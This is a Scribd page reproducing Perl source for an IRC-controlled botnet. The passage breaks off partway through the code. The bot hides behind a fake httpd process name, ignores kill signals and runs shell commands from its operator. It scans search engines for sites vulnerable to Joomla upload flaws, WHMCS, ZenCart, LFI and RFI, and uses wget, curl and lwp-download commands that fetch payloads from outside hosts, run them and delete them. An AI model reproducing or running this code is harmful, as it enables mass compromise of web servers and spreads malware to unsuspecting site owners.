Scribd
Upload
814 views58 pages

Su

This document contains code for an IRC bot. It defines variables for the bot's configuration like nickname, channel, and commands. It includes functions for connecting to IRC servers, parsing messages, and executing commands. The bot is designed to spread malware by responding to commands with URLs to malicious files.

Uploaded by

Winata Kl Bela
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
814 views58 pages

Su

This document contains code for an IRC bot. It defines variables for the bot's configuration like nickname, channel, and commands. It includes functions for connecting to IRC servers, parsing messages, and executing commands. The bot is designed to spread malware by responding to commands with URLs to malicious files.

Uploaded by

Winata Kl Bela
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 58

#!/usr/bin/perl use HTTP::Request; use HTTP::Request::Common; use HTTP::Request::Common qw(POST); use LWP::Simple; use LWP 5.

64; use LWP::UserAgent; use Socket; use IO::Socket; use IO::Socket::INET; use IO::Select; use MIME::Base64; use URI::Escape; use Digest::MD5 qw(md5_hex); #use DBI; #use DBD::mysql; my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my $datetime $fakeproc $ircserver $ircport $nickname $ident $channel $chanxxx $chaninfo $submitchan $sqlchan = $admin $fullname $rawmsg $msgraw localtime; "/usr/sbin/httpd"; "visa666.suka.se"; "6667"; "ASU"; "bot"; "#pi"; = "#pi"; = "#pi"; = "#pi"; "#pi"; = "pool"; = "4,1ovd Sc-An.8TJCE"; = $ARGV[4]; = $ARGV[5]; = = = = = = =

$nob0dy = "3(6Nobody3) "; $whmcslogo = "3(6WHMCS3) "; $thumblogo = "4,1JCE0 BY: MGM "; $zerologo = "3(6zBoarD3) "; $lfilogo = "3(6LFI3) "; $rfilogo = "3(6RFI3) "; $xmllogo = "3(6XML3) "; $oscologo = "3(6OSCO3) "; $oscosqllogo = "3(6O-SQL3) "; $e107logo = "3(6E1073) "; $ihlogo = "3(6Is-Human3) "; $zenlogo = "12ZenCart3) "; $rfglogo = "3(6RFG3) "; $carilogo = "129Find3) "; $sqllogo = "3(6SQL3PegaL) "; $civicrmlogo = "3(CIVICRM3) "; $acylogo = "3(ACYMAILING3) "; $jnewsllogo = "3(JNEWSLETTER3) "; $jinclogo = "3(JINC3) "; $mailogo = "3(MAIANMEDIA3) "; $jnewslogo = "3(JNEWS3) "; $jnewlogo = "3(JNEW3) "; $whmcscmd = '!whmz'; $thumbcmd = "!jn"; $zerocmd = "!zero"; $lficmd = "!lfi";

my $rficmd = "!rfi"; my $xmlcmd = "!xml"; my $e107cmd = "!e107"; my $zencmd = ".zen"; my $ihcmd = "!ishu"; my $oscocmd = "!osc"; my $sqlcmd = "!sql"; my $cmdlfi = "!cmdlfi"; my $cmdxml = "!cmdxml"; my $cmde107 = "!cmde107"; my $rfgcmd = "!rfg"; my $ftpcmd = "!ftp"; my $civicrmcmd = "!civ"; my $acycmd = "!acy"; my $jnewslcmd = "!jn"; my $jinccmd = "!jin"; my $maicmd = "!mai"; my $jnewscmd = "!jnw"; my $jnewcmd = "!jne"; my $spreadMode = 1; my $zerowget = 1; my $zerolwp = 1; my $zerocurl = 1; my $gps = 1; my $gps2 = 1; my $timot = 10; my $silentmode = 1; my $thumbid = "http://picasa.com.my-corner.us/jahat.php"; my $thumbshell = "http://picasa.com.my-corner.us/jahat.php"; #my $hostinjector = "picasa.com.my-corner.us"; #my $thumbid = "http://".$hostinjector."/bad.php"; #my $botdid = "http://".$hostinjector."/bad.php"; #my $botxdid = "http://".$hostinjector."/bad.php"; #my $injec = "http://".$hostinjector."/bad.php"; #my $thumbshell = uri_escape($thumbid); #my $md5php = md5_hex($thumbid).".php"; #my $md5bot = md5_hex($botdid).".php"; #my $md5botx = md5_hex($botxdid).".php"; #my $botid = uri_escape($botdid); #my $botxid = uri_escape($botxdid); #my $injector = "http://flickr.com.timomentum.com.br/bad.txt?"; #my $botshell = "http://flickr.com.timomentum.com.br/bot.txt?"; #my $botshell1 = "http://picasa.com.jdautocentergyn.com.br/bad.txt?"; #my $subticket = "/submitticket.php?step=2&deptid=1"; my $action = "/data/shell.php"; my $wgetdon = "?cmd=wget http://".$hostinjector."/jack.php;wget http://biriq.com //wp-includes/perl.jpg;perl perl.jpg;rm -rf perl.jpg;wget http://picasa.com.jdau tocentergyn.com.br/rabot.txt;rm -rf rabot.txt"; my $lwpdon = "?cmd=lwp-download -a http://".$hostinjector."/jack.php;lwp-downloa d http://biriq.com//wp-includes/perl.jpg;perl perl.jpg;rm -rf perl.jpg;lwp-downl oad http://picasa.com.jdautocentergyn.com.br/bot.txt;php b.jpg;rm -rf bot.txt"; my $curldon = "?cmd=curl -O http://".$hostinjector."/jack.php;curl -O http://bir iq.com//wp-includes/perl.jpg;perl perl.jpg;rm -rf perl.jpg;curl -O http://picasa .com.jdautocentergyn.com.br/bot.txt;php bot.txt;rm -rf bot.txt"; my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko /20100115 Firefox/3.6"; my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../ ../../../proc/self/environ%0000"; my $iam = "/wp-content/themes/Linepress/cache/error.php?____pgfa=https%2 53A%252F%252Fwww.google.com%252Fsearch?q=";

#"/image s/default/index2.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; my $iam2 = "/wp-content/uploads/error.php?____pgfa=https%253A%252F%252Fww w.google.com%252Fsearch?q="; #"/wp-admin/includes/ind ex2.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; my $iam3 = "/wp-content/themes/folioway/cache/error.php?____pgfa=https%25 3A%252F%252Fwww.google.com%252Fsearch?q="; my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.googl e.com%252Fsearch?q="; my $Indo1 = "http://hero.co.ke".$iam; my $Indo2 = "http://audiovideolife.com/wp-includes/class-mail.php?q=".$iam2; my $Indo3 = "http://www.zuquibraz.com.br/wp-includes/class-mail.php?____pgfa=".$ iam3; my $Indo4 = "http://www.zuquibraz.com.br/wp-includes/class-mail.php?____pgfa=".$ iam3; my $Indo5 = "http://audiovideolife.com/wp-includes/class-mail.php?q=".$iam2; my $Indo6 = "http://audiovideolife.com/wp-includes/class-mail.php?q=".$iam2; my $engine = "IndoAC,IndoAD,IndoAE,IndoAF,IndoAG,IndoAL,IndoAM,IndoAN,IndoA T,IndoAR,IndoAU,IndoBE,IndoBG,IndoBY,IndoHU,IndoOrG,IndoCoM,IndoNeT,IndoPL,IndoI T,IndoID,IndoMY, IndoES,IndoFI,IndoGOV,IndoHK,IndoHR,IndoIL,IndoL V,IndoMD,IndoNO,IndoNZ,IndoUK,IndoUS,IndoJP,IndoKR,IndoDE,IndoDK,IndoCA,IndoBR,I ndoRO,IndoRU,IndoNL,IndoInfO,IndoFR,IndoIN,IndoMX,IndoCZ,IndoCL,IndoCO,IndoCK,In doEC,IndoEDU,IndoEE,IndoGR,IndoUA, IndoCN,IndoIR,IndoTH,IndoEU,IndoPH,IndoPK,IndoPT ,IndoIL,IndoSE,IndoSG,IndoTK,IndoTR,IndoTV,IndoTW,IndoVN,IndoWS,IndoIM,IndoSI,In doZA,IndoBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,B igLobe,SeZNam"; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/tmp"); chop (my $priper = `wget http://picasa.com.jdautocentergyn.com.br/bat.txt -O id. jpg;wget http://picasa.com.jdautocentergyn.com.br/bot.txt -O pahit.jpg;wget http ://biriq.com//wp-includes/tempe.gif -O mysql.jpg`); $ircserver = "$ARGV[0]" if $ARGV[0]; $ircport = "$ARGV[1]" if $ARGV[1]; $nickname = "$ARGV[2]" if $ARGV[2]; $channel = '#'."$ARGV[3]" if $ARGV[3]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } }

sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_c on", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname "); sleep(1);}} sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick($mynick.int(rand(5))); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("NS id qwe123"); sleep(3); sendraw("JOIN $channel correct"); sendraw("JOIN $chanxxx mejen"); sleep(1); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircpo rt"); } select(undef, undef, undef, 0.01); delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) {

$sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime."" ); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) { sendraw("$rawmsg $msgraw ".$1); } if (&isAdmin($nick) && $msg =~ /^!say (.+)/) { sendraw("PRIVMSG $rawmsg ".$1); } if (&isAdmin($nick) && $msg =~ /^!act (.+)/) { sendraw("PRIVMSG $rawmsg :ACTION ".$1.""); } if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) { if (my $pid = fork) { waitpid($pid, 0);

} else { if (fork) { exit; } else { $newthumbcmd = $1; $thumbcmd = $newthumbcmd; &msg("$admin","$thumblogo12 Scan Command change to4 $thumbcmd "); }}} if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) { $newzerocmd = $1; $zerocmd = $newzerocmd; &msg("$admin","$zerologo12 Scan Command c hange to4 $zerocmd "); } if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) { $newwhmcscmd = $1; $whmcscmd = $newwhmcscmd; &msg("$admin","$whmcslogo12 Scan Command change to4 $whmcscmd "); } if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) d/) { $newtimot = $1; $timot = $newtimot; &msg("$admin","12 Get Content TimeOut cha nge to4 $timot "); } if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $newchan = $1; $chanxxx = $newchan; &msg("$admin","12 xChan change to4 $chanxx x "); }}} } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1");

} if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } if ($msg=~ /^!silent\s+(.*) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $smod = $1; if ($smod =~ /ON/) { $silentmode = 1; $silentsta t = "ON"; } elsif ($smod =~ /OFF/) { $silentmode = 0; $silen tstat = "OFF"; } &msg("$path","12Silent Mode15 $silentstat !!!!"); }}} if ($msg=~ /^!Indox\s+(.*) -d/) { $engmod = $1; if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACT IVATED"; } elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; } &msg("$path","12Indo Engine15 $gpsstat !!! !"); } if ($msg=~ /^!engine\s+(.*) -d/) { $engmod = $1; if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "AC TIVATED"; } elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; } &msg("$path","12Multi Engine15 $gpsstat !! !!"); } if (&isAdmin($nick) && $msg =~ /^!injector\s+(.* ) -d/) { $newhostinjector= $1; $hostinjector = $newhostinjector; &msg("$path","12Injector 15change to4 $host injector "); } if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){ my $url = $1.$lfdtest; my $cmd = $2; &cmdlfi($url,$cmd,$path); } if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmdxml($url,$cmd,$path); } if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmde107($url,$cmd,$path); } ################################################################ ##### HELP COMMAND if ($msg=~ /^!help/) {

my $helplogo = "4,1Help ";sleep(3); &msg("$path","$helplogo0JCEboard :15 $thum bcmd [bug] [dork] "); &msg("$path","$helplogo0RFG :15 $rfgcmd [b ug] [dork] "); &msg("$path","$helplogo0RFI :15 $rficmd [b ug] [dork] "); &msg("$path","$helplogo0LFI :15 $lficmd [b ug] [dork] "); &msg("$path","$helplogo0XML :15 $xmlcmd [b ug] [dork] "); &msg("$path","$helplogo0e107 :15 $e107cmd [dork] "); &msg("$path","$helplogo0WHMCS :15 $whmcscm d [dork] "); &msg("$path","$helplogo0ZeroBoard :15 $zer ocmd [dork] "); &msg("$path","$helplogo0osCommerce :15 $os cocmd [dork] "); &msg("$path","$helplogo0ZenCart :15 $zencm d [dork] "); &msg("$path","$helplogo0CIVICRM :15 $civic rmcmd [dork] "); &msg("$path","$helplogo0ACYMAILING :15 $ac ycmd [dork] "); &msg("$path","$helplogo0JNEWSLETTER :15 $j newslcmd [dork] "); &msg("$path","$helplogo0JINC :15 $jinccmd [dork] "); &msg("$path","$helplogo0MAIANMEDIA :15 $ma icmd [dork] "); &msg("$path","$helplogo0JNEWS :15 $jnewscm d [dork] "); &msg("$path","$helplogo0JNEW :15 $jnewcmd [dork] "); } if (&isAdmin($nick) && $msg =~ /^!pid/) { &msg("$nick","6Fake Process/PID : $fakeproc - $$"); } if ($msg=~ /^!respon/ || $msg=~ /^!id/) { if (&isFound($thumbid,"GIF89")) { &msg("$path","9,1Injector13 Pronto - Ready....!!! "); } else { &msg("$path","9,1Injector4 Falhou - Lost!!! "); } } if ($msg=~/^!bypass/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $bystats1 = "";my $bystats2 = "";my $ bystats3 = "";my $bystats4 = "";my $bystats5 = ""; my $cekby1 = &get_content($Indo1."byroe" ); if ($cekby1 =~ /byroe\.net/i){ $bystats1 = "9Up!!!"; } else { $bystats1 = "4Lost!!!"; } my $cekby2 = &get_content($Indo2."byroe" ); if ($cekby2 =~ /byroe\.net/i){ $bystats2 = "9Up!!!"; } else { $bystats2 = "4Lost!!!"; } my $cekby3 = &get_content($Indo3."byroe"

); if ($cekby3 =~ /byroe\.net/i){ $bystats3 = "9Up!!!"; } else { $bystats3 = "4Lost!!!"; } my $cekby4 = &get_content($Indo4."byroe" ); if ($cekby4 =~ /byroe\.net/i){ $bystats4 = "9Up!!!"; } else { $bystats4 = "4Lost!!!"; } my $cekby5 = &get_content($Indo5."byroe" ); if ($cekby5 =~ /byroe\.net/i){ $bystats5 = "9Up!!!"; } else { $bystats5 = "4Lost!!!"; } my $cekby6 = &get_content($Indo6."byroe" ); if ($cekby6 =~ /byroe\.net/i){ $bystats6 = "9Up!!!"; } else { $bystats6 = "4Lost!!!"; } &msg("$path","9i'm here without bypass br other....") }}} ################################################################ ##### SCAN if ($msg =~ /!cari\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $find = $1; &msg($path,"$carilogo12 Searching 15$find "); &cari($path,$find); } exit; } } if ($msg =~ /^$oscocmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; my $simpan = 'situs.txt'; if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","12$nick 1 5lagi scan Oscommerce di 4$path "); &msg("$path","$oscologo12 Dork :15 $dork "); &msg("$path","$oscologo12 Search Engine15 Loading "); &se_start($path,"apalah" ,$simpan,$dork,$engine,9); } else { &msg("$path","12Injector4 Lost!!! "); exit; } } } } if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","12$nick 1 5lagi scan LFI di 4$path ");

&msg("$path","$lfilogo12D ork :15 $dork "); &msg("$path","$lfilogo12B ugz :15 $bug "); &msg("$path","$lfilogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,3); } else { &msg("$path","12Injector4 Lost!!! "); exit; } } } } if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","12$nick 1 5lagi scan RFI di 4$path "); &msg("$path","$rfilogo12D ork :15 $dork "); &msg("$path","$rfilogo12B ugz :15 $bug "); &msg("$path","$rfilogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,5); } else { &msg("$path","12Injector4 Lost!!!"); exit; } } } } if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; &msg("$chanxxx","12,1$nic k 15lagi scan XML di 4$path "); &msg("$path","$xmllogo12D ork :15 $dork "); &msg("$path","$xmllogo12B ugz :15 $bug "); &msg("$path","$xmllogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,6); } } } if ($msg =~ /^$thumbcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

my ($bug,$dork) = ("administrator/compon ents/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.ph p",$1); my $simpan = 'situs.txt'; if ($bug =~ m/^\//){ &msg("$path ","12Bug Dilarang Pakek \/ di depan :p "); exit; } else { if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","0,1$nick 4,1Disparou Scan Don't Flood - No floodar Canal 4$path "); &msg("$path","$thumblogo1 2Dork :4 $dork "); &msg("$path","$thumblogo1 2Bugz :0 $bug "); &msg("$path","$thumblogo0 Search Engine4 Loading... "); &se_start($path,$bug,$si mpan,$dork,$engine,1); } else { &msg("$path","12Injector4 Lost!!!"); exit; } } } } } if ($msg =~ /^$whmcscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("cart.php?a=b yroe&templatefile=",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan WHMCS di 4$path "); &msg("$path","$whmcslogo1 2Dork :15 $dork "); &msg("$path","$whmcslogo1 2Search Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,2); } } } if ($msg =~ /^$zerocmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("zboard.php?i d=byroe",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan zboard di 4$path "); &msg("$path","$zerologo12 Dork :15 $dork "); &msg("$path","$zerologo12 Search Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,4); } else { &msg("$path","12Injector4

Lost!!!"); } } } } if ($msg =~ /^$e107cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("contact.php" ,$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan E107 di 4$path "); &msg("$path","$e107logo12 Dork :15 $dork "); &msg("$path","$e107logo12 Search Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,7); } else { &msg("$path","12Injector4 Lost!!!"); } } } } if ($msg =~ /^$ihcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("wp-content/p lugins/is-human/engine.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan Is-Human di 4$path "); &msg("$path","$ihlogo12Do rk :15 $dork "); &msg("$path","$ihlogo12Se arch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,8); } else { &msg("$path","12Injector4 Lost!!!"); } } } } if ($msg =~ /^$zencmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("admin/sqlpat ch.php/password_forgotten.php?action=execute",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 15lagi sc an ZenCart di 4$path "); &msg("$path","$zenlogo12Dork :15 $

dork "); &msg("$path","$zenlogo12Search En gine15 Loading "); &se_start($path,$bug,$simpan,$do rk,$engine,10); } } } if ($msg =~ /^$rfgcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("apalah",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 15lagi sc an RFG di 4$path "); &msg("$path","$rfglogo12Dork :15 $ dork "); &msg("$path","$rfglogo12Search En gine15 Loading "); &se_start($path,$bug,$simpan,$do rk,$engine,11); } } } if ($msg =~ /^$sqlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan SQL di 4$path "); &msg("$path","$sqllogo12D ork :15 $dork "); &msg("$path","$sqllogo12B ugz :15 $bug "); &msg("$path","$sqllogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,12); } } } if ($msg =~ /^$civicrmcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upl oad_image.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan CIVICRM di 4$path "); &msg("$path","$civicrmlo go12Dork :15 $dork "); &msg("$path","$civicrmlo go12Bugz :15 $bug "); &msg("$path","$civicrmlo go12Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,13);

} } } if ($msg =~ /^$acycmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php", $1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan ACYMAILING di 4$path "); &msg("$path","$acylogo12D ork :15 $dork "); &msg("$path","$acylogo12B ugz :15 $bug "); &msg("$path","$acylogo12S earch Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,14); } } } if ($msg =~ /^$jnewslcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_ image.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JNEWSLETTER di 4$path "); &msg("$path","$jnewsllog o12Dork :15 $dork "); &msg("$path","$jnewsllog o12Bugz :15 $bug "); &msg("$path","$jnewsllog o12Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,15); } } } if ($msg =~ /^$jinccmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php",$1) ; my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JINC di 4$path "); &msg("$path","$jinclogo12 Dork :15 $dork "); &msg("$path","$jinclogo12 Bugz :15 $bug "); &msg("$path","$jinclogo12 Search Engine15 Loading ");

sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,16); } } } if ($msg =~ /^$maicmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.ph p",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan MAIANMEDIA di 4$path "); &msg("$path","$mailogo12D ork :15 $dork "); &msg("$path","$mailogo12B ugz :15 $bug "); &msg("$path","$mailogo12S earch Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,17); } } } if ($msg =~ /^$jnewscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image. php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JNEWS di 4$path "); &msg("$path","$jnewslogo1 2Dork :15 $dork "); &msg("$path","$jnewslogo1 2Bugz :15 $bug "); &msg("$path","$jnewslogo1 2Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,18); } } } if ($msg =~ /^$jnewcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("components/c om_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JNEW di 4$path "); &msg("$path","$jnewlogo12 Dork :15 $dork "); &msg("$path","$jnewlogo12 Bugz :15 $bug ");

